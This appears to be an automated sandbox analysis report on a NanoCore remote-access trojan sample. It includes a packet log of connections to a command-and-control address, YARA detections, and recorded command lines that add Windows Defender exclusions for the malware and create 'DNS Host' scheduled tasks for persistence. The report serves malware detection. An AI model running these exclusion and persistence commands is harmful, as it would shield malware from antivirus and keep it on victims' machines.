Nov 1, 2024 06:20:06.082742929 CET	1664	49988	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:06.799988985 CET	1664	49988	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:06.800211906 CET	49988	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:06.805026054 CET	1664	49988	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:07.087852955 CET	49988	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:11.092974901 CET	49993	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:11.098109961 CET	1664	49993	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:11.098206043 CET	49993	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:11.098540068 CET	49993	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:11.103342056 CET	1664	49993	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:12.066342115 CET	1664	49993	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:12.066596985 CET	49993	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:12.071543932 CET	1664	49993	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:12.092525005 CET	49993	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:16.109921932 CET	49994	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:16.116424084 CET	1664	49994	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:16.116610050 CET	49994	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:16.117228031 CET	49994	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:16.123044968 CET	1664	49994	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:17.046058893 CET	1664	49994	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:17.046231985 CET	49994	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:17.051136971 CET	1664	49994	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:17.101772070 CET	49994	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:21.109033108 CET	49995	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:21.114012957 CET	1664	49995	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:21.114118099 CET	49995	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:21.114434004 CET	49995	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:21.119247913 CET	1664	49995	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:22.062494040 CET	1664	49995	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:22.062726974 CET	49995	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:22.067730904 CET	1664	49995	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:22.108459949 CET	49995	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:26.124120951 CET	49996	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:26.129224062 CET	1664	49996	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:26.132253885 CET	49996	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:26.132571936 CET	49996	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:26.137496948 CET	1664	49996	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:27.076494932 CET	1664	49996	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:27.076791048 CET	49996	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:20:27.083561897 CET	1664	49996	66.63.187.113	192.168.2.5
Nov 1, 2024 06:20:27.108151913 CET	49996	1664	192.168.2.5	66.63.187.113

Target ID:	0
Start time:	01:18:53
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\nD2ozRD7MN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nD2ozRD7MN.exe"
Imagebase:	0xa70000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore, Description: detect Nanocore in memory, Source: 00000000.00000002.2022736940.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore, Description: detect Nanocore in memory, Source: 00000000.00000002.2022736940.00000000047CA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:18:55
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Imagebase:	0x630000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:18:55
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:18:55
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\nD2ozRD7MN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nD2ozRD7MN.exe"
Imagebase:	0x7ff6d64d0000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557957967.0000000007880000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557822095.0000000007860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558104090.00000000078A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558552439.00000000078F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557377899.00000000076D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3549495564.00000000045E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3553716195.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558267406.00000000078C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558019588.0000000007890000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558638769.0000000007900000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3558861975.0000000007930000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3553602529.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557767120.0000000007850000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557903252.0000000007870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000005.00000002.3557457551.00000000076E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000005.00000002.3549495564.00000000046DB000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000005.00000002.3543198585.000000000341D000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000005.00000002.3543198585.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:18:56
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:18:56
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:18:56
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /f /tn "DNS Host Task" /xml "C:\Users\user\AppData\Local\Temp\tmpC8C1.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:18:56
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\nD2ozRD7MN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\nD2ozRD7MN.exe 0
Imagebase:	0x320000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore, Description: detect Nanocore in memory, Source: 00000009.00000002.2062497793.0000000004075000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore, Description: detect Nanocore in memory, Source: 00000009.00000002.2062497793.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:18:56
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:18:58
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nD2ozRD7MN.exe"
Imagebase:	0x630000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: nD2ozRD7MN.exePID: 7456, Parent PID: 7288

General

Target ID:	12
Start time:	01:18:58
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\nD2ozRD7MN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nD2ozRD7MN.exe"
Imagebase:	0x8a0000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: Nanocore, Description: detect Nanocore in memory, Source: 0000000C.00000002.2110027651.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2112791881.0000000003C39000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.2112471535.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:18:58
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:18:58
Start date:	01/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:18:59
Start date:	01/11/2024
Path:	C:\Program Files (x86)\DNS Host\dnshost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DNS Host\dnshost.exe" 0
Imagebase:	0xcc0000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs Detection: 39%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:19:00
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files (x86)\DNS Host\dnshost.exe"
Imagebase:	0x630000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:19:00
Start date:	01/11/2024
Path:	C:\Program Files (x86)\DNS Host\dnshost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DNS Host\dnshost.exe"
Imagebase:	0xa50000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000011.00000002.2136851578.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:19:00
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:19:08
Start date:	01/11/2024
Path:	C:\Program Files (x86)\DNS Host\dnshost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DNS Host\dnshost.exe"
Imagebase:	0x490000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:19:09
Start date:	01/11/2024
Path:	C:\Program Files (x86)\DNS Host\dnshost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\DNS Host\dnshost.exe"
Imagebase:	0xe10000
File size:	776'192 bytes
MD5 hash:	8E2827146C4C433AFFBA78C88FD685DB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:20:29
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1960
Imagebase:	0x5c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.8%
Total number of Nodes:	293
Total number of Limit Nodes:	19

Executed Functions

Function 07F3CD54 Relevance: 11.0, Strings: 8, Instructions: 981
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hiq, xrefs: 07F3EE70
Hiq, xrefs: 07F3F0D3
PHeq, xrefs: 07F3E981
Hiq, xrefs: 07F3F292
Hiq, xrefs: 07F3ECB1
(iq, xrefs: 07F3E9AD
Hiq, xrefs: 07F3EC52
Hiq, xrefs: 07F3F074

Memory Dump Source

Source File: 00000000.00000002.2037425052.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7f30000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID: (iq$Hiq$Hiq$Hiq$Hiq$Hiq$Hiq$PHeq
API String ID: 0-201796279
Opcode ID: 5b1e3bda87d35f8f86549a0e8c9e25c2316956b740c40076587c0ef30ffb2ee0
Instruction ID: 934b0fa931fab6ca0358b68732d4dfdd6fc59894d6774a1c5dfc1cff22d179dd
Opcode Fuzzy Hash: 5b1e3bda87d35f8f86549a0e8c9e25c2316956b740c40076587c0ef30ffb2ee0
Instruction Fuzzy Hash: 8172BDB0B002158FCB48AB78C85466E7BA6FFC9710F248569E51ADB3A5CF30DD4687A1

Function 0553E7F0 Relevance: 7.0, Strings: 5, Instructions: 723COMMON

Download Yara Rule

Strings

